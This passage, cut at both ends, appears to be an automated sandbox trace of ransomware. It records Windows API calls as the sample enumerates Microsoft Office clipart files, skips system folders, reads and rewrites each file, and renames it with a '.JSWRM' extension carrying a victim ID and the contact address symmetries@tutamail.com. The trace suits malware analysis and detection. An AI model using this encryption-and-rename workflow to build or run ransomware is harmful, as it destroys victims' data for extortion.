dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.260] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=359) returned 1 [0099.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x160) returned 0x234a30 [0099.260] ReadFile (in: hFile=0x314, lpBuffer=0x234a30, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesRead=0x345e89c*=0x160, lpOverlapped=0x0) returned 1 [0099.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.261] WriteFile (in: hFile=0x314, lpBuffer=0x234a30*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesWritten=0x345e898*=0x160, lpOverlapped=0x0) returned 1 [0099.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234a30 | out: hHeap=0x1e0000) returned 1 [0099.261] CloseHandle (hObject=0x314) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0099.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0099.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01238_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01238_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01238_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01238_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.263] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01239_.GIF", cAlternateFileName="")) returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2=".") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="..") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="...") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="windows") returned -1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="recovery") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="perflogs") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="documents and settings") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="system volume information") returned 1 [0099.263] lstrcmpiW (lpString1="WB01239_.GIF", lpString2="msocache") returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01239_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01239_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01239_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01239_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01239_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01239_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0099.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01239_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01239_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.265] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=410) returned 1 [0099.265] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x190) returned 0x1ff448 [0099.265] ReadFile (in: hFile=0x314, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345e89c*=0x190, lpOverlapped=0x0) returned 1 [0099.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.266] WriteFile (in: hFile=0x314, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345e898*=0x190, lpOverlapped=0x0) returned 1 [0099.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0099.266] CloseHandle (hObject=0x314) returned 1 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0099.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0099.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0099.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.266] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01239_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01239_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01239_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01239_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.267] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01240_.GIF", cAlternateFileName="")) returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2=".") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="..") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="...") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="windows") returned -1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="recovery") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="perflogs") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="documents and settings") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.267] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="system volume information") returned 1 [0099.268] lstrcmpiW (lpString1="WB01240_.GIF", lpString2="msocache") returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01240_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01240_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01240_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01240_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01240_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01240_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0099.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01240_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01240_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.269] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=333) returned 1 [0099.269] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0099.269] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e89c*=0x140, lpOverlapped=0x0) returned 1 [0099.270] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.270] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e898*=0x140, lpOverlapped=0x0) returned 1 [0099.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.270] CloseHandle (hObject=0x314) returned 1 [0099.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0099.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0099.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0099.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0099.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.271] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01240_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01240_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01240_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01240_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0099.272] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01241_.GIF", cAlternateFileName="")) returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2=".") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="..") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="...") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="windows") returned -1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="recovery") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="perflogs") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="documents and settings") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="system volume information") returned 1 [0099.272] lstrcmpiW (lpString1="WB01241_.GIF", lpString2="msocache") returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01241_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01241_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01241_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01241_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01241_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01241_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01241_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01241_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.281] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=386) returned 1 [0099.281] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x180) returned 0x201568 [0099.281] ReadFile (in: hFile=0x314, lpBuffer=0x201568, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x201568*, lpNumberOfBytesRead=0x345e89c*=0x180, lpOverlapped=0x0) returned 1 [0099.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.282] WriteFile (in: hFile=0x314, lpBuffer=0x201568*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x201568*, lpNumberOfBytesWritten=0x345e898*=0x180, lpOverlapped=0x0) returned 1 [0099.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x201568 | out: hHeap=0x1e0000) returned 1 [0099.282] CloseHandle (hObject=0x314) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.282] MultiByteToWideChar (in: 